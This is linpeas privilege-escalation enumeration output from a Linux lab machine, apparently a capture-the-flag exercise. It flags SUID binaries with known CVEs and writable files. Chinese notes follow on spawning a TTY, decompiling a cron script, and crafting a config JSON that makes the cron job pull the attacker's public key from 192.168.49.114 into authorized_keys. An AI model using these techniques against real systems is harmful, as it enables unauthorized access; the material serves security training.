╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 3 root root 4096 May 10 2020 /usr/lib/python2.7/dist-packages/keyrings
drwxr-xr-x 3 root root 4096 May 10 2020 /usr/lib/python3/dist-packages/keyrings
drwxr-xr-x 2 root root 4096 May 6 2020 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Sep 18 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Sep 18 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Sep 18 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jan 10 2019 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 7399 Sep 18 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 2253 Mar 21 2018 /usr/share/keyrings/ubuntu-esm-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-updates-keyring.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg
╔══════════╣ Kubernetes information
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 www-data www-data 49 Feb 15 17:22 /var/log/lighttpd/error.log
╔══════════╣ Analyzing Other Interesting Files Files (limit 70)
-rw-r--r-- 1 root root 3771 Apr 5 2018 /etc/skel/.bashrc
-rw-r--r-- 1 root root 807 Apr 5 2018 /etc/skel/.profile
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid>
-rwsr-xr-x 1 root root 44K Mar 23 2019 /bin/su
-rwsr-xr-x 1 root root 27K Mar 5 2020 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 43K Mar 5 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 75K Mar 23 2019 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 75K Mar 23 2019 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 23 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 146K Jan 31 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 59K Mar 23 2019 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 22K Mar 27 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 37K Mar 23 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 37K Mar 23 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 40K Mar 23 2019 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-sr-x 1 root root 107K Oct 30 2019 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 14K Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42K Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
╔══════════╣ SGID
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid>
-rwxr-sr-x 1 root crontab 39K Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 355K Mar 4 2019 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root shadow 23K Mar 23 2019 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71K Mar 23 2019 /usr/bin/chage
-rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 31K Mar 5 2020 /usr/bin/wall
-rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwsr-sr-x 1 root root 107K Oct 30 2019 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwxr-sr-x 1 root shadow 34K Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Feb 27 2019 /sbin/unix_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so>
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
/usr/lib/x86_64-linux-gnu/libfakeroot
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities>
Current capabilities:
Current: =
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Shell capabilities:
0x0000000000000000=
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
╔══════════╣ Users with capabilities
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities>
╔══════════╣ Files with ACLs (limited to 50)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls>
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path>
/usr/bin/gettext.sh
╔══════════╣ Unexpected in root
/vmlinuz
/initrd.img.old
/initrd.img
/vmlinuz.old
/swapfile
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files>
total 28
drwxr-xr-x 2 root root 4096 May 6 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh
-rw-r--r-- 1 root root 825 Oct 30 2019 apps-bin-path.sh
-rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d>
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/opt/.tick-serv
/opt/.web/static/css
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/journal/71d425fbe76e481183a186a4c87ab689/system.journal
/var/log/syslog
╔══════════╣ Writable log files (logrotten) (limit 100)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation>
Writable: /var/log/lighttpd/error.log
╔══════════╣ Files inside /home/www-data (limit 20)
╔══════════╣ Files inside others home (limit 20)
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup folders
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 7857 May 11 2020 /lib/modules/4.15.0-101-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 7905 May 11 2020 /lib/modules/4.15.0-101-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 7857 Apr 23 2020 /lib/modules/4.15.0-99-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 7905 Apr 23 2020 /lib/modules/4.15.0-99-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 7838 Apr 24 2018 /lib/modules/4.15.0-20-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 7886 Apr 24 2018 /lib/modules/4.15.0-20-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 35544 Mar 25 2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 217469 Apr 23 2020 /usr/src/linux-headers-4.15.0-99-generic/.config.old
-rw-r--r-- 1 root root 0 Apr 23 2020 /usr/src/linux-headers-4.15.0-99-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Apr 23 2020 /usr/src/linux-headers-4.15.0-99-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 216818 Apr 24 2018 /usr/src/linux-headers-4.15.0-20-generic/.config.old
-rw-r--r-- 1 root root 0 Apr 24 2018 /usr/src/linux-headers-4.15.0-20-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Apr 24 2018 /usr/src/linux-headers-4.15.0-20-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 217460 May 11 2020 /usr/src/linux-headers-4.15.0-101-generic/.config.old
-rw-r--r-- 1 root root 0 May 11 2020 /usr/src/linux-headers-4.15.0-101-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 May 11 2020 /usr/src/linux-headers-4.15.0-101-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz
-rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 11755 May 6 2020 /usr/share/info/dir.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found: /var/lib/mlocate/mlocate.db: regular file, no read permission
╔══════════╣ Web files?(output limit)
/var/www/:
total 20K
drwxr-xr-x 4 root root 4.0K Sep 30 2020 .
drwxr-xr-x 14 root root 4.0K May 7 2020 ..
drwxr-xr-x 2 root root 4.0K Jun 25 2019 cgi-bin
drwxr-xr-x 3 root root 4.0K May 19 2020 html
-rw-r--r-- 1 www-data www-data 33 Apr 21 14:33 local.txt
/var/www/cgi-bin:
total 8.0K
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rwxr-xr-x 1 saint saint 1403 Jun 4 2020 /opt/.configuration.cpython-38.pyc
-rw-r--r-- 1 landscape landscape 0 May 6 2020 /var/lib/landscape/.cleanup.user
-rw------- 1 root root 0 Apr 26 2018 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 5 2018 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 1531 May 6 2020 /etc/apparmor.d/cache/.features
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxrwx 1 www-data www-data 152 Apr 21 15:34 /tmp/x.elf
-rwxrwxrwx 1 www-data www-data 763810 Apr 21 15:41 /tmp/linpeas.sh
-rw-r--r-- 1 root root 437 May 6 2020 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 8226 Jun 1 2020 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 51200 Jul 7 2020 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 360 May 7 2020 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root root 884 May 16 2020 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 135 May 6 2020 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 878 May 10 2020 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 593270 Jun 4 2020 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 11 May 5 2020 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 342 May 6 2020 /var/backups/apt.extended_states.4.gz
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files>
/dev/mqueue
/dev/shm
/opt/.tick-serv
/opt/.tick-serv/tickets.sh
/opt/.web
/opt/.web/data.json
/opt/.web/static
/opt/.web/static/css
/opt/.web/static/css/css.css
/opt/.web/static/img
/opt/.web/templates
/opt/.web/templates/index.html
/opt/.web/webapp.py
/run/lighttpd
/run/lock
/run/screen
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/var/cache/lighttpd/compress
/var/cache/lighttpd/compress/css.css-gzip-393266-2262-1156926736
/var/cache/lighttpd/compress/highway
/var/cache/lighttpd/compress/index.html-gzip-413113-1414-1589899601
/var/cache/lighttpd/uploads
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lighttpd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/swapfile.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/web.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/xinetd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/log/lighttpd
/var/log/lighttpd/error.log
/var/tmp
/var/www/local.txt
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files>
Group www-data:
/tmp/x.elf
/tmp/linpeas.sh
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python2.7/dist-packages/keyring/credentials.py
/usr/lib/python2.7/dist-packages/keyring/credentials.pyc
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/share/dns/root.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/usr/share/ubuntu-advantage-tools/modules/credentials.sh
/var/cache/debconf/passwords.dat
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
python3 -c 'import pty; pty.spawn("/bin/bash")' 进入tty
下载下来然后反编译pyc文件。
<https://tool.lu/pyc/>
#!/usr/bin/env python
# visit <https://tool.lu/pyc/> for more information
from configuration import *
from connectors.ftpconn import *
from connectors.sshconn import *
from connectors.utils import *
def main():
'''Main function
Cron job is going to make my work easy peasy
'''
configPath = ConfigReader.set_config_path()
config = ConfigReader.read_config(configPath)
connections = checker(config)
if 'FTP' in connections:
ftpcon(config['FTP'])
elif 'SSH' in connections:
sshcon(config['SSH'])
elif 'URL' in connections:
sync(config['URL'], config['Output'])
if __name__ == '__main__':
main()
//sy文件
#!/usr/bin/env python
# visit <https://tool.lu/pyc/> for more information
import os
import sys
import json
from glob import glob
from datetime import datetime as dt
class ConfigReader:
config = None
def read_config(path):
'''Reads the config file
'''
config_values = { }
# WARNING: Decompyle incomplete
read_config = staticmethod(read_config)
def set_config_path():
'''Set the config path
'''
files = glob('/home/saint/*.json')
other_files = glob('/tmp/*.json')
files = files + other_files
try:
if len(files) > 2:
files = files[:2]
file1 = os.path.basename(files[0]).split('.')
file2 = os.path.basename(files[1]).split('.')
if file1[-2] == 'config' and file2[-2] == 'config':
a = dt.strptime(file1[0], '%d-%m-%Y')
b = dt.strptime(file2[0], '%d-%m-%Y')
if b < a:
filename = files[0]
else:
filename = files[1]
finally:
pass
except Exception:
sys.exit(1)
return filename
set_config_path = staticmethod(set_config_path)
//config文件
创建文件21-04-2022.config.json
{
"URL":"<http://192.168.49.114/id_rsa.pub>",
"Output":"/home/saint/.ssh/authorized_keys"
}
然后等到他拿到公钥,直接ssh免密登录进去。
这里吃了一个亏。。。重置了机子。。。发现被这个误导了。。
仔细看了一手sudoers才意识到问题,需要个root组权限。
于是新建一个root组的用户查看sudoers发现只需要jason,然后可以执行apt命令,于是一搜搜到这个。
<https://www.freebuf.com/articles/system/261271.html>